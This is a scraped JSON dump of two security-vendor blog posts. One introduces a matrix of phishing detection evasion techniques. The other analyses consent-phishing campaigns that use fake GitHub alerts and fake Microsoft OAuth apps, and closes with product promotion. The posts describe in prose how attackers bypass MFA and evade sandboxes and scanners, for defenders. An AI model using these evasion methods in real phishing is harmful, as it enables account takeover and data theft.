",{"data":47452,"content":47456,"nodeType":996},{"target":47453},{"sys":47454},{"id":47455,"type":1001,"linkType":1002},"7rK8RR8KKQ9DbBouZKnjs6",[],{"data":47458,"content":47459,"nodeType":1005},{},[],{"data":47461,"content":47462,"nodeType":1009},{},[47463],{"data":47464,"marks":47465,"value":47467,"nodeType":864},{},[47466],{"type":899},"How phishing has evolved",{"data":47469,"content":47470,"nodeType":860},{},[47471],{"data":47472,"marks":47473,"value":47474,"nodeType":864},{},[],"It’s easy to write off phishing as unsophisticated and simplistic, particularly when we think back to the first generation of phishing attacks — static HTML pages purely designed to steal your username and password, linked directly from an email. ",{"data":47476,"content":47477,"nodeType":860},{},[47478,47482,47491],{"data":47479,"marks":47480,"value":47481,"nodeType":864},{},[],"Modern phishing has changed a lot in the past decade or so. ",{"data":47483,"content":47485,"nodeType":883},{"uri":47484},"https://phishing-techniques.pushsecurity.com/techniques/aitm-phishing/",[47486],{"data":47487,"marks":47488,"value":47490,"nodeType":864},{},[47489],{"type":1455},"MFA-bypassing  Attacker-in-the-Middle (AitM) kits",{"data":47492,"marks":47493,"value":47494,"nodeType":864},{},[]," are table stakes — anyone can pick up a copy of Evilginx and immediately blow past most email and network security solutions on the market.  ",{"data":47496,"content":47497,"nodeType":860},{},[47498,47502,47510,47514,47522,47526,47534],{"data":47499,"marks":47500,"value":47501,"nodeType":864},{},[],"But the most sophisticated attacks — the ones that usually hit the headlines in the form of major breaches — are doing much more than this. The latest generation of fully customized AitM phishing kits are ",{"data":47503,"content":47504,"nodeType":883},{"uri":41146},[47505],{"data":47506,"marks":47507,"value":47509,"nodeType":864},{},[47508],{"type":1455},"dynamically obfuscating the code that loads the web page",{"data":47511,"marks":47512,"value":47513,"nodeType":864},{},[],", implementing ",{"data":47515,"content":47516,"nodeType":883},{"uri":35537},[47517],{"data":47518,"marks":47519,"value":47521,"nodeType":864},{},[47520],{"type":1455},"bot protection through custom CAPTCHA",{"data":47523,"marks":47524,"value":47525,"nodeType":864},{},[],", and using ",{"data":47527,"content":47528,"nodeType":883},{"uri":29155},[47529],{"data":47530,"marks":47531,"value":47533,"nodeType":864},{},[47532],{"type":1455},"runtime anti-analysis features",{"data":47535,"marks":47536,"value":47537,"nodeType":864},{},[],", making them increasingly difficult to detect by the tools most enterprises are using to combat the problem. ",{"data":47539,"content":47540,"nodeType":860},{},[47541,47545,47552,47556,47565,47569,47577],{"data":47542,"marks":47543,"value":47544,"nodeType":864},{},[],"The techniques used by attackers to deliver phishing lures are also more sophisticated. Groups like Scattered Spider have been seen using ",{"data":47546,"content":47547,"nodeType":883},{"uri":23426},[47548],{"data":47549,"marks":47550,"value":441,"nodeType":864},{},[47551],{"type":1455},{"data":47553,"marks":47554,"value":47555,"nodeType":864},{},[]," techniques, delivering phishing links via paid Google ads, while phishing campaigns are frequently encountered in ",{"data":47557,"content":47559,"nodeType":883},{"uri":47558},"https://phishing-techniques.pushsecurity.com/techniques/instant-messenger/",[47560],{"data":47561,"marks":47562,"value":47564,"nodeType":864},{},[47563],{"type":1455},"IM apps",{"data":47566,"marks":47567,"value":47568,"nodeType":864},{},[]," (such as Slack and Teams), as well as ",{"data":47570,"content":47571,"nodeType":883},{"uri":38998},[47572],{"data":47573,"marks":47574,"value":47576,"nodeType":864},{},[47575],{"type":1455},"public messaging services",{"data":47578,"marks":47579,"value":47580,"nodeType":864},{},[]," like LinkedIn messenger and Reddit — bypassing email altogether. ",{"data":47582,"content":47583,"nodeType":860},{},[47584,47588,47597,47601,47608],{"data":47585,"marks":47586,"value":47587,"nodeType":864},{},[],"The latest trends indicate that attackers are responding to increasingly hardened IdP/SSO configuration by using alternative phishing techniques that circumvent MFA and passkeys, either by ",{"data":47589,"content":47591,"nodeType":883},{"uri":47590},"https://phishing-techniques.pushsecurity.com/techniques/mfa-downgrade/",[47592],{"data":47593,"marks":47594,"value":47596,"nodeType":864},{},[47595],{"type":1455},"downgrading to a backup (less secure) authentication method",{"data":47598,"marks":47599,"value":47600,"nodeType":864},{},[],", or sidestepping the legitimate auth process entirely through methods like ",{"data":47602,"content":47603,"nodeType":883},{"uri":30446},[47604],{"data":47605,"marks":47606,"value":22602,"nodeType":864},{},[47607],{"type":1455},{"data":47609,"marks":47610,"value":10094,"nodeType":864},{},[],{"data":47612,"content":47613,"nodeType":860},{},[47614,47618,47627],{"data":47615,"marks":47616,"value":47617,"nodeType":864},{},[],"Attackers have also realized how much valuable data exists in Shadow SaaS highlighted by major SaaS breaches impacting apps like Snowflake. This is driving ",{"data":47619,"content":47621,"nodeType":883},{"uri":47620},"https://phishing-techniques.pushsecurity.com/techniques/saas-admins/",[47622],{"data":47623,"marks":47624,"value":47626,"nodeType":864},{},[47625],{"type":1455},"broader targeting against apps like Slack, Mailchimp, Postman, GitHub, and other commonly-used business apps directly",{"data":47628,"marks":47629,"value":47630,"nodeType":864},{},[]," — bypassing IdPs (MS, Google, Okta, etc.) that typically have more robust authentication controls in place.",{"data":47632,"content":47635,"nodeType":996},{"target":47633},{"sys":47634},{"id":41197,"type":1001,"linkType":1002},[],{"data":47637,"content":47638,"nodeType":1005},{},[],{"data":47640,"content":47641,"nodeType":1009},{},[47642],{"data":47643,"marks":47644,"value":47646,"nodeType":864},{},[47645],{"type":899},"Using the phishing detection evasion techniques matrix",{"data":47648,"content":47649,"nodeType":860},{},[47650],{"data":47651,"marks":47652,"value":47653,"nodeType":864},{},[],"With so much attacker innovation happening in the phishing space, it’s tricky for security teams and solution vendors to have a big picture view of the subtle changes attackers are making to their phishing attacks, and precisely why they’re doing it — or more specifically, which detection techniques they’re evading. ",{"data":47655,"content":47656,"nodeType":860},{},[47657],{"data":47658,"marks":47659,"value":47660,"nodeType":864},{},[],"If you look at one of the many phishing kit teardowns found in security blogs online (including our own) it can be hard to see the wood for the trees when it comes to understanding why a phishing page behaves in the way it does — why is it behaving in this way? What control exactly is this trying to get around? ",{"data":47662,"content":47663,"nodeType":860},{},[47664],{"data":47665,"marks":47666,"value":47667,"nodeType":864},{},[],"By creating a simple framework breaking down the categories of a phishing attack into phases, each with its own specific attacker objective, we can better understand phishing kit behavior and track meaningful changes over time. This ensures that we understand how we need to adapt to as an industry in order to detect and block these attacks. ",{"data":47669,"content":47670,"nodeType":860},{},[47671],{"data":47672,"marks":47673,"value":47674,"nodeType":864},{},[],"The matrix covers the following categories:",{"data":47676,"content":47677,"nodeType":941},{},[47678,47693,47708,47723,47738,47753,47768,47783],{"data":47679,"content":47680,"nodeType":945},{},[47681],{"data":47682,"content":47683,"nodeType":860},{},[47684,47689],{"data":47685,"marks":47686,"value":47688,"nodeType":864},{},[47687],{"type":899},"Phase 1: Targeting",{"data":47690,"marks":47691,"value":47692,"nodeType":864},{},[]," — Identifying apps and users to evade security controls and achieve the shortest time-to-impact of a phishing attack. ",{"data":47694,"content":47695,"nodeType":945},{},[47696],{"data":47697,"content":47698,"nodeType":860},{},[47699,47704],{"data":47700,"marks":47701,"value":47703,"nodeType":864},{},[47702],{"type":899},"Phase 2: Link delivery",{"data":47705,"marks":47706,"value":47707,"nodeType":864},{},[]," — Deliver links using phishing vectors that evade traditional security controls. ",{"data":47709,"content":47710,"nodeType":945},{},[47711],{"data":47712,"content":47713,"nodeType":860},{},[47714,47719],{"data":47715,"marks":47716,"value":47718,"nodeType":864},{},[47717],{"type":899},"Phase 3: Link camouflage",{"data":47720,"marks":47721,"value":47722,"nodeType":864},{},[]," — Masking malicious links to prevent detection at the email, network proxy, or safe browsing layer. ",{"data":47724,"content":47725,"nodeType":945},{},[47726],{"data":47727,"content":47728,"nodeType":860},{},[47729,47734],{"data":47730,"marks":47731,"value":47733,"nodeType":864},{},[47732],{"type":899},"Phase 4: TI evasion ",{"data":47735,"marks":47736,"value":47737,"nodeType":864},{},[],"— Preventing TI feeds from flagging and blocking known-bad domains by masking or changing elements likely to be flagged.",{"data":47739,"content":47740,"nodeType":945},{},[47741],{"data":47742,"content":47743,"nodeType":860},{},[47744,47749],{"data":47745,"marks":47746,"value":47748,"nodeType":864},{},[47747],{"type":899},"Phase 5: Anti-analysis",{"data":47750,"marks":47751,"value":47752,"nodeType":864},{},[]," — Techniques to defeat automated “sandbox” analysis tools by preventing security teams and bots from accessing the page.",{"data":47754,"content":47755,"nodeType":945},{},[47756],{"data":47757,"content":47758,"nodeType":860},{},[47759,47764],{"data":47760,"marks":47761,"value":47763,"nodeType":864},{},[47762],{"type":899},"Phase 6: Page obfuscation",{"data":47765,"marks":47766,"value":47767,"nodeType":864},{},[]," — Obfuscating page elements to break detection signatures analysing page content and code. ",{"data":47769,"content":47770,"nodeType":945},{},[47771],{"data":47772,"content":47773,"nodeType":860},{},[47774,47779],{"data":47775,"marks":47776,"value":47778,"nodeType":864},{},[47777],{"type":899},"Phase 7: Defeat MFA & CA",{"data":47780,"marks":47781,"value":47782,"nodeType":864},{},[]," — Defeat authentication and access controls in order to successfully execute the phishing attack.",{"data":47784,"content":47785,"nodeType":945},{},[47786],{"data":47787,"content":47788,"nodeType":860},{},[47789,47794],{"data":47790,"marks":47791,"value":47793,"nodeType":864},{},[47792],{"type":899},"Phase 8: Account takeover",{"data":47795,"marks":47796,"value":47797,"nodeType":864},{},[]," — Achieve a form of account takeover and conclude the identity attack, enabling further exploitation to take place.",{"data":47799,"content":47800,"nodeType":860},{},[47801],{"data":47802,"marks":47803,"value":47804,"nodeType":864},{},[],"Combining techniques and approaches from these categories is what enables attackers to bypass the majority of phishing detection controls they encounter today. You typically find that the more advanced the phishing kit / attacker, the more techniques they’ll leverage. And as phishing infrastructure becomes increasingly templated and commodified with as-a-Service or for-hire models, the average phishing attack will employ more of these measures to counter security controls. ",{"data":47806,"content":47807,"nodeType":1005},{},[],{"data":47809,"content":47810,"nodeType":1009},{},[47811],{"data":47812,"marks":47813,"value":23798,"nodeType":864},{},[47814],{"type":899},{"data":47816,"content":47817,"nodeType":860},{},[47818,47821,47829],{"data":47819,"marks":47820,"value":21,"nodeType":864},{},[],{"data":47822,"content":47823,"nodeType":883},{"uri":47440},[47824],{"data":47825,"marks":47826,"value":47828,"nodeType":864},{},[47827],{"type":1455},"You can find the matrix here.",{"data":47830,"marks":47831,"value":21,"nodeType":864},{},[],{"data":47833,"content":47834,"nodeType":860},{},[47835,47839,47846],{"data":47836,"marks":47837,"value":47838,"nodeType":864},{},[],"If you want to learn more about the research that led us to this point, and our take on how and why phishing attacks have evolved, ",{"data":47840,"content":47841,"nodeType":883},{"uri":39300},[47842],{"data":47843,"marks":47844,"value":47845,"nodeType":864},{},[],"you can also check out our latest whitepaper. ",{"data":47847,"marks":47848,"value":21,"nodeType":864},{},[],{"data":47850,"content":47851,"nodeType":1005},{},[],{"data":47853,"content":47854,"nodeType":1009},{},[47855],{"data":47856,"marks":47857,"value":47859,"nodeType":864},{},[47858],{"type":899},"Get involved!",{"data":47861,"content":47862,"nodeType":860},{},[47863,47867,47873],{"data":47864,"marks":47865,"value":47866,"nodeType":864},{},[],"Like the ",{"data":47868,"content":47869,"nodeType":883},{"uri":6418},[47870],{"data":47871,"marks":47872,"value":5765,"nodeType":864},{},[],{"data":47874,"marks":47875,"value":47876,"nodeType":864},{},[],", we’d love to see the security community using and helping us to maintain this resource to ensure it stays up to date with techniques as they evolve. ",{"data":47878,"content":47879,"nodeType":860},{},[47880],{"data":47881,"marks":47882,"value":47883,"nodeType":864},{},[],"Unlike the SaaS matrix, which we’ve seen mostly leveraged by offensive security practitioners, phishing detection evasion techniques are most useful to blue teamers looking to assess current detection capabilities and understand why certain attacks got through existing defenses. ",{"data":47885,"content":47886,"nodeType":860},{},[47887,47891,47899],{"data":47888,"marks":47889,"value":47890,"nodeType":864},{},[],"If you’d like to add techniques you’ve observed or examples that you think demonstrate them, ",{"data":47892,"content":47894,"nodeType":883},{"uri":47893},"https://github.com/pushsecurity/phishing-techniques",[47895],{"data":47896,"marks":47897,"value":47898,"nodeType":864},{},[],"get involved on GitHub!",{"data":47900,"marks":47901,"value":21,"nodeType":864},{},[],"Introducing our guide to phishing detection evasion techniques","Introducing our latest resource for security teams breaking down the techniques that modern phishing attacks are using to evade detection. ","2025-08-06T00:00:00.000Z","phishing-detection-evasion-launch",{"items":47907},[47908,47910],{"sys":47909,"name":342},{"id":6596},{"sys":47911,"name":6593},{"id":6592},{"items":47913},[47914],{"fullName":10772,"firstName":10773,"jobTitle":10774,"profilePicture":47915},{"url":10776},"blog/phishing-with-active-directory-federation-services",{"json":47918},{"data":47919,"content":47920,"nodeType":856},{},[47921],{"data":47922,"content":47923,"nodeType":860},{},[47924],{"data":47925,"marks":47926,"value":47927,"nodeType":864},{},[],"We recently identified a novel phishing attack combining the latest phishing detection evasion techniques —  including clever use of Active Directory Federation Services to get Microsoft to send victims to a phishing site using legitimate login URLs. ",{"id":40373,"publishedAt":47929},"2026-08-12T11:53:55.176Z",{"items":47931},[47932,47934],{"sys":47933,"name":342},{"id":6596},{"sys":47935,"name":6593},{"id":6592},{"items":47937},[47938,47940,47942,47944,47946,47948,47950,47952,47954,47956,47958,47960,47962],{"sys":47939,"name":279,"slug":280,"tier":31},{"id":276},{"sys":47941,"name":519,"slug":520,"tier":31},{"id":516},{"sys":47943,"name":413,"slug":414,"tier":31},{"id":410},{"sys":47945,"name":342,"slug":343,"tier":31},{"id":339},{"sys":47947,"name":324,"slug":325,"tier":45},{"id":321},{"sys":47949,"name":431,"slug":432,"tier":45},{"id":428},{"sys":47951,"name":466,"slug":467,"tier":45},{"id":463},{"sys":47953,"name":261,"slug":262,"tier":45},{"id":258},{"sys":47955,"name":440,"slug":441,"tier":45},{"id":437},{"sys":47957,"name":607,"slug":608,"tier":45},{"id":604},{"sys":47959,"name":351,"slug":352,"tier":45},{"id":348},{"sys":47961,"name":475,"slug":476,"tier":45},{"id":472},{"sys":47963,"name":563,"slug":564,"tier":45},{"id":560},"dozBZpxPXWnLshPNZaAcQQBGc0U-2nUdHCgKovcPriI",{"id":47966,"title":47967,"authorsCollection":47968,"content":47973,"extension":228,"faqItemsCollection":48525,"faqTitle":59,"featured":6,"hashTags":59,"meta":48527,"metaTitle":48528,"ogImage":59,"postType":5740,"publishedDate":48529,"relatedBlogPostsCollection":48530,"slug":50649,"stem":50650,"subtitle":59,"summary":50651,"synopsis":50662,"sys":50663,"tagsCollection":50666,"topicsCollection":50672,"__hash__":50700},"blog/blog/how-consent-phishing-is-evolving.json","How consent phishing is evolving to defeat detection controls",{"items":47969},[47970],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":47971,"profilePicture":47972},[18135],{"url":2740},{"json":47974,"links":48410},{"data":47975,"content":47976,"nodeType":856},{},[47977,48006,48026,48033,48040,48043,48051,48058,48064,48070,48076,48083,48103,48109,48112,48120,48127,48134,48141,48147,48154,48161,48167,48174,48193,48198,48205,48208,48216,48223,48229,48236,48282,48288,48295,48298,48306,48313,48320,48326,48332,48338,48341,48349,48356,48362,48369,48376,48379,48386,48393],{"data":47978,"content":47979,"nodeType":860},{},[47980,47983,47990,47994,48002],{"data":47981,"marks":47982,"value":21,"nodeType":864},{},[],{"data":47984,"content":47985,"nodeType":883},{"uri":22596},[47986],{"data":47987,"marks":47988,"value":26966,"nodeType":864},{},[47989],{"type":1455},{"data":47991,"marks":47992,"value":47993,"nodeType":864},{},[]," was one of the first techniques we added to the ",{"data":47995,"content":47997,"nodeType":883},{"uri":47996},"https://github.com/pushsecurity/saas-attacks?tab=readme-ov-file",[47998],{"data":47999,"marks":48000,"value":47375,"nodeType":864},{},[48001],{"type":1455},{"data":48003,"marks":48004,"value":48005,"nodeType":864},{},[],", where attackers trick users into authorizing malicious OAuth apps. ",{"data":48007,"content":48008,"nodeType":860},{},[48009,48013,48022],{"data":48010,"marks":48011,"value":48012,"nodeType":864},{},[],"The attacker sends a phishing link to a target that requests permissions to access sensitive data or permissions to perform dangerous actions for an app the victim is using. If the target grants consent for the permissions, the adversary gains that level of access over the target’s account — and certain data and functionality ",{"data":48014,"content":48016,"nodeType":883},{"uri":48015},"https://pushsecurity.com/blog/the-risky-terrain-of-oauth-scopes-in-third-party/",[48017],{"data":48018,"marks":48019,"value":48021,"nodeType":864},{},[48020],{"type":1455},"depending on the scopes granted",{"data":48023,"marks":48024,"value":48025,"nodeType":864},{},[],". This attack bypasses MFA entirely (including phishing-resistant MFA) by sidestepping the login process — think of it as an authorization attack, as opposed to an authentication one. Naturally, this means it also persists through typical authentication changes like a password reset. ",{"data":48027,"content":48028,"nodeType":860},{},[48029],{"data":48030,"marks":48031,"value":48032,"nodeType":864},{},[],"Consent phishing has been primarily aimed at getting access to larger cloud platforms like Microsoft Azure or Google Workspace tenants, or more complex apps like GitHub. These apps present an obvious opportunity to attackers in terms of the functionality and and data they contain.  ",{"data":48034,"content":48035,"nodeType":860},{},[48036],{"data":48037,"marks":48038,"value":48039,"nodeType":864},{},[],"Two separate cases of consent phishing have hit the headlines this month representing very different use cases — let’s compare them. ",{"data":48041,"content":48042,"nodeType":1005},{},[],{"data":48044,"content":48045,"nodeType":1009},{},[48046],{"data":48047,"marks":48048,"value":48050,"nodeType":864},{},[48049],{"type":899},"1. Classic consent phishing",{"data":48052,"content":48053,"nodeType":860},{},[48054],{"data":48055,"marks":48056,"value":48057,"nodeType":864},{},[],"Attackers targeted GitHub users across 12,000 repositories by creating fake security alert issues in GitHub repositories. These legit-looking alerts send the victim to a GitHub authorization page for a \"gitsecurityapp\" OAuth app that requests a lot of very risky scopes granting full access to a user's account and repositories.",{"data":48059,"content":48063,"nodeType":996},{"target":48060},{"sys":48061},{"id":48062,"type":1001,"linkType":1002},"7s7VLePAQzhzXJ6cFkSCAe",[],{"data":48065,"content":48069,"nodeType":996},{"target":48066},{"sys":48067},{"id":48068,"type":1001,"linkType":1002},"5dppSzNOgffeZTZK2lG6V5",[],{"data":48071,"content":48075,"nodeType":996},{"target":48072},{"sys":48073},{"id":48074,"type":1001,"linkType":1002},"1dsYU7bM5mPW1AXyRLnqpp",[],{"data":48077,"content":48078,"nodeType":860},{},[48079],{"data":48080,"marks":48081,"value":48082,"nodeType":864},{},[],"Once authorized, the attacker has extensive access to the account, from which point they can modify repositories to conduct further attacks against users (e.g. by infecting them with malware), poison the repos and services connected to the repository, and exfiltrate any sensitive data the account has access to. ",{"data":48084,"content":48085,"nodeType":860},{},[48086,48090,48099],{"data":48087,"marks":48088,"value":48089,"nodeType":864},{},[],"Alongside consent phishing, this is an example of ",{"data":48091,"content":48093,"nodeType":883},{"uri":48092},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/in-app_phishing/description.md",[48094],{"data":48095,"marks":48096,"value":48098,"nodeType":864},{},[48097],{"type":1455},"in-app phishing",{"data":48100,"marks":48101,"value":48102,"nodeType":864},{},[],", which avoids delivering the message via corporate email. Even if the target gets an email notification, the phish isn’t delivered via email directly, and so email-based scanning solutions won’t detect it — they’ll receive a legitimate notification email directly from GitHub. It’s also less likely to raise suspicion as GitHub issue notifications are expected, increasing the click chance. ",{"data":48104,"content":48108,"nodeType":996},{"target":48105},{"sys":48106},{"id":48107,"type":1001,"linkType":1002},"6d6MMyPQ7vaY2KrJTHGeO6",[],{"data":48110,"content":48111,"nodeType":1005},{},[],{"data":48113,"content":48114,"nodeType":1009},{},[48115],{"data":48116,"marks":48117,"value":48119,"nodeType":864},{},[48118],{"type":899},"2. Not really consent phishing?",{"data":48121,"content":48122,"nodeType":860},{},[48123],{"data":48124,"marks":48125,"value":48126,"nodeType":864},{},[],"This example is much more unusual. In this case, the attacker used malicious Microsoft OAuth apps impersonating Adobe and DocuSign. ",{"data":48128,"content":48129,"nodeType":860},{},[48130],{"data":48131,"marks":48132,"value":48133,"nodeType":864},{},[],"Rather than trying to grab lots of juicy permissions for Microsoft, the attacker used consent phishing to prevent automated analysis of their phishing page by security tools. To be served the real phishing page, you need to first authorize the fake OAuth app — meaning that security tools and bots won’t be able to reach the page to determine if it’s malicious or not. ",{"data":48135,"content":48136,"nodeType":860},{},[48137],{"data":48138,"marks":48139,"value":48140,"nodeType":864},{},[],"The attack started with attackers sending phishing emails to target users with a fake password reset lure. ",{"data":48142,"content":48146,"nodeType":996},{"target":48143},{"sys":48144},{"id":48145,"type":1001,"linkType":1002},"3cLd6EbraN9fKuGgL0kkgC",[],{"data":48148,"content":48149,"nodeType":860},{},[48150],{"data":48151,"marks":48152,"value":48153,"nodeType":864},{},[],"Because the initial phishing link directs to the legitimate login.microsoftonline.com URL, it appears legitimate and bypasses common domain-based security checks. ",{"data":48155,"content":48156,"nodeType":860},{},[48157],{"data":48158,"marks":48159,"value":48160,"nodeType":864},{},[],"After clicking the link, the user signs into their real Microsoft account (this might even happen automatically if the user is already signed in on the device/browser they’re using). They are then redirected to a permissions request page for the fake OAuth app. ",{"data":48162,"content":48166,"nodeType":996},{"target":48163},{"sys":48164},{"id":48165,"type":1001,"linkType":1002},"6O4CSx1VCoPAIjjsnKzu75",[],{"data":48168,"content":48169,"nodeType":860},{},[48170],{"data":48171,"marks":48172,"value":48173,"nodeType":864},{},[],"The permissions requested by the app (profile, email, openid) are so limited as to be basically unexploitable. They are also the same permissions you would accept if you were authorizing Microsoft to perform a social login (SSO via OIDC) to a third party app.",{"data":48175,"content":48176,"nodeType":860},{},[48177,48181,48189],{"data":48178,"marks":48179,"value":48180,"nodeType":864},{},[],"Clicking the link redirects the victim to the malicious page but masks it using the legit Cloudflare Turnstile service. As well as making the page look more credible (since its fronted by a legit service to block bots) this is a common detection evasion technique we’ve ",{"data":48182,"content":48184,"nodeType":883},{"uri":48183},"https://pushsecurity.com/blog/how-aitm-phishing-kits-evade-detection/",[48185],{"data":48186,"marks":48187,"value":40631,"nodeType":864},{},[48188],{"type":1455},{"data":48190,"marks":48191,"value":48192,"nodeType":864},{},[]," which prevents security solutions from accessing and analysing the malicious page. ",{"data":48194,"content":48197,"nodeType":996},{"target":48195},{"sys":48196},{"id":40094,"type":1001,"linkType":1002},[],{"data":48199,"content":48200,"nodeType":860},{},[48201],{"data":48202,"marks":48203,"value":48204,"nodeType":864},{},[],"After completing the verification, the page (and the malicious phishing kit element) is finally loaded. If the victim authenticates, the session will be stolen by the attacker, along with the captured credentials and MFA code. ",{"data":48206,"content":48207,"nodeType":1005},{},[],{"data":48209,"content":48210,"nodeType":1009},{},[48211],{"data":48212,"marks":48213,"value":48215,"nodeType":864},{},[48214],{"type":899},"Using consent phishing to evade detection",{"data":48217,"content":48218,"nodeType":860},{},[48219],{"data":48220,"marks":48221,"value":48222,"nodeType":864},{},[],"The attacker is essentially using their fake OAuth app to prevent security analysts and bots from analysing the real phishing page, because the first page loaded is a link to a legitimate Microsoft domain. They’re also layering it with a range of other detection evasion techniques like using Cloudflare Turnstile.  ",{"data":48224,"content":48228,"nodeType":996},{"target":48225},{"sys":48226},{"id":48227,"type":1001,"linkType":1002},"4Bi9YoMwWVmKoWfkh5tiTA",[],{"data":48230,"content":48231,"nodeType":860},{},[48232],{"data":48233,"marks":48234,"value":48235,"nodeType":864},{},[],"We’ve previously blogged about how attackers are using layered detection evasion techniques to circumvent typical phishing page detections, which are often email-based, including:",{"data":48237,"content":48238,"nodeType":941},{},[48239,48260],{"data":48240,"content":48241,"nodeType":945},{},[48242],{"data":48243,"content":48244,"nodeType":860},{},[48245,48248,48256],{"data":48246,"marks":48247,"value":21,"nodeType":864},{},[],{"data":48249,"content":48250,"nodeType":883},{"uri":48183},[48251],{"data":48252,"marks":48253,"value":48255,"nodeType":864},{},[48254],{"type":1455},"Prevent analysis of phishing pages",{"data":48257,"marks":48258,"value":48259,"nodeType":864},{},[]," by security bots, including using legitimate services like Cloudflare Workers and Turnstile (as above), CAPTCHA, and various sandbox-aware techniques to ensure only the intended victim is served the phishing page, such as only providing the correct parameters to load the page if the correct path is followed (rather than attempting to load the malicious page by going directly to the domain). ",{"data":48261,"content":48262,"nodeType":945},{},[48263],{"data":48264,"content":48265,"nodeType":860},{},[48266,48269,48278],{"data":48267,"marks":48268,"value":21,"nodeType":864},{},[],{"data":48270,"content":48272,"nodeType":883},{"uri":48271},"https://pushsecurity.com/blog/how-aitm-phishing-kits-evade-detection-p2/",[48273],{"data":48274,"marks":48275,"value":48277,"nodeType":864},{},[48276],{"type":1455},"DOM and visual obfuscation",{"data":48279,"marks":48280,"value":48281,"nodeType":864},{},[]," of phishing pages when the victim does land on the page to prevent it from being identified as malicious through signature-based detection of page elements. ",{"data":48283,"content":48287,"nodeType":996},{"target":48284},{"sys":48285},{"id":48286,"type":1001,"linkType":1002},"2dN8np5odBecf7r1vBr69K",[],{"data":48289,"content":48290,"nodeType":860},{},[48291],{"data":48292,"marks":48293,"value":48294,"nodeType":864},{},[],"This seems a bit overkill and many of the steps here are likely to raise suspicion — like the fact that you’re never asked to provide the original code for the password reset, and are asked to unexpectedly consent to an OAuth app. But clearly, the attacker is more concerned about bypassing technical safeguards than human ones (not a great endorsement for the state of phishing awareness training). ",{"data":48296,"content":48297,"nodeType":1005},{},[],{"data":48299,"content":48300,"nodeType":1009},{},[48301],{"data":48302,"marks":48303,"value":48305,"nodeType":864},{},[48304],{"type":899},"How Push detects and blocks phishing attacks",{"data":48307,"content":48308,"nodeType":860},{},[48309],{"data":48310,"marks":48311,"value":48312,"nodeType":864},{},[],"Push overcomes the various detection evasion techniques shown here by using in-browser detections based on the phishing page that the user sees. This means that no matter where the user accesses the link from (email, IM platform, social media, or anywhere else on the internet) Push can observe and analyse the page to determine if it's malicious. ",{"data":48314,"content":48315,"nodeType":860},{},[48316],{"data":48317,"marks":48318,"value":48319,"nodeType":864},{},[],"Push uses layered detections based on identifying the phishing kit running on the page itself, whether the page is cloned from a legitimate login page, as well as detecting whether the credentials being entered on the page have been used to log into your SSO account previously. ",{"data":48321,"content":48325,"nodeType":996},{"target":48322},{"sys":48323},{"id":48324,"type":1001,"linkType":1002},"6B1toQAf44rDzQZijYRd9g",[],{"data":48327,"content":48331,"nodeType":996},{"target":48328},{"sys":48329},{"id":48330,"type":1001,"linkType":1002},"4ixcEsEW4EyqckOTmP5Pbb",[],{"data":48333,"content":48337,"nodeType":996},{"target":48334},{"sys":48335},{"id":48336,"type":1001,"linkType":1002},"01musWa3FUiO0CVFNWfwcy",[],{"data":48339,"content":48340,"nodeType":1005},{},[],{"data":48342,"content":48343,"nodeType":1009},{},[48344],{"data":48345,"marks":48346,"value":48348,"nodeType":864},{},[48347],{"type":899},"Using Push to review OAuth integrations",{"data":48350,"content":48351,"nodeType":860},{},[48352],{"data":48353,"marks":48354,"value":48355,"nodeType":864},{},[],"You can also use Push to discover and remove risky OAuth integrations accepted by your users. ",{"data":48357,"content":48361,"nodeType":996},{"target":48358},{"sys":48359},{"id":48360,"type":1001,"linkType":1002},"5kJvy5SBcWLrK2EhLyR1ZD",[],{"data":48363,"content":48364,"nodeType":860},{},[48365],{"data":48366,"marks":48367,"value":48368,"nodeType":864},{},[],"This shows which OAuth apps have been added, which apps they are integrated with, what permissions they’ve been granted, as well as other properties that indicate risk (e.g. whether the app’s publisher has been verified). ",{"data":48370,"content":48371,"nodeType":860},{},[48372],{"data":48373,"marks":48374,"value":48375,"nodeType":864},{},[],"If your users are consent phished, you’ll be notified via webhook event that a new integration has been added. These risky integrations can be removed via the Push platform by clicking ‘delete integration’. ",{"data":48377,"content":48378,"nodeType":1005},{},[],{"data":48380,"content":48381,"nodeType":1009},{},[48382],{"data":48383,"marks":48384,"value":40331,"nodeType":864},{},[48385],{"type":899},{"data":48387,"content":48388,"nodeType":860},{},[48389],{"data":48390,"marks":48391,"value":48392,"nodeType":864},{},[],"It doesn’t stop there — Push provides comprehensive identity attack detection and response capabilities against techniques like credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix identity vulnerabilities across every app that your employees use like: ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more. ",{"data":48394,"content":48395,"nodeType":860},{},[48396,48399,48407],{"data":48397,"marks":48398,"value":40953,"nodeType":864},{},[],{"data":48400,"content":48402,"nodeType":883},{"uri":48401},"https://pushsecurity.com/demo?utm_campaign=9983377-FY25Q1_Bleeping-Computer-Organic-Article&utm_source=bleepingcomputer&utm_medium=sponsored-content&utm_content=organic%20article",[48403],{"data":48404,"marks":48405,"value":40352,"nodeType":864},{},[48406],{"type":1455},{"data":48408,"marks":48409,"value":40356,"nodeType":864},{},[],{"entries":48411},{"hyperlink":48412,"inline":48413,"block":48414},[],[],[48415,48423,48431,48438,48443,48451,48458,48466,48473,48480,48488,48496,48518],{"sys":48416,"__typename":1724,"title":48417,"caption":48418,"layoutMode":59,"file":48419},{"id":48062},"Consent phishing blog image 1","Initial notification in GitHub repo",{"url":48420,"width":48421,"height":48422},"https://images.ctfassets.net/y1cdw1ablpvd/45AWiiVZDMMx4wkVeh4OmH/e043c8d9975ad87c354c60ed2b95f3d8/image11_1.png",1145,520,{"sys":48424,"__typename":1724,"title":48425,"caption":48426,"layoutMode":59,"file":48427},{"id":48068},"Consent phishing image 2","Phishing message delivered via GitHub",{"url":48428,"width":48429,"height":48430},"https://images.ctfassets.net/y1cdw1ablpvd/5SF3XeGhHBxwDX8WamgdOI/66abad1b2770344e360c276c33528129/image_506.png",1372,1045,{"sys":48432,"__typename":1724,"title":48433,"caption":48434,"layoutMode":59,"file":48435},{"id":48074},"Consent phishing image 3","Consent phishing authorization page connecting the victim's GitHub account to the malicious app",{"url":48436,"width":8970,"height":48437},"https://images.ctfassets.net/y1cdw1ablpvd/2NfxL5bELb1XbET7MubvGN/e47630f6d0a3c85c3f2c567c4e443a0c/image1.png",1065,{"sys":48439,"__typename":1717,"type":1718,"ctaText":48440,"buttonLabel":48441,"buttonColour":1721,"buttonUrl":48442},{"id":48107},"Learn why phishing prevention needs 